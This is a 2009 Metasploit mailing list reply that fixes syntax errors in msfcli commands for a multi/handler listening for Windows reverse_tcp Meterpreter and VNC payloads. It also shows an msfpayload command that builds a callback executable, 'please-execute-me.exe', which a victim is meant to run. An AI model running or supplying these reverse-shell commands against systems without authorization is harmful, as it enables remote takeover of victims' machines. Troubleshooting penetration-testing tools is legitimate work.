Metasploit mailing list archives

msfcli


From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Sat, 28 Mar 2009 16:24:15 +0200

Nicolas,


2009/3/27 Nicolas Krassas <krasn at ans.gr>

Greetings,
  I've encountered a strange problem on msfcli, i'm pasting the lines
below,

root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx E
[*] Please wait while we load the module tree...
./msfcli:150: undefined method `datastore' for nil:NilClass (NoMethodError)


It is meterpreter not metepreter, you missed the "r"



root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[-] Exploit failed:

Here above i just pressed ctrl c to interrupt the cli


Syntax is corrent, but your victim needs somehow to execute the appropriate
payload, you can build it using msfpayload as:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X
please-execute-me.exe





root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx LPORT 4444
DisableCourtesyShell=TRUE E
[*] Please wait while we load the module tree...
./lib/msf/core/data_store.rb:93:in `each': The argument could not be parsed
correctly. (Rex::ArgumentParseError)
      from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
      from ./msfcli:140

Again error when i'm using the correct ip address of the host,


Wrong syntax, you have missed the equal sign in the LPORT parameter, it
should be LPORT=4444





./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp  E
[*] Please wait while we load the module tree...
[-] Exploit failed: The following options failed to validate: LHOST.

And finally

root at fr:~/trunk# ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=91.xxx.xx.xxx  E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


Syntax corrent, all you need to do, it make the victim execute the payload,
as described previously...




The commands where used one after the other, no change was done on the
system in between.

Regards,
Dinos
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



Hope the above would work for you.
-- 
AM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090328/7d3fe9b3/attachment-0001.htm>


Current thread: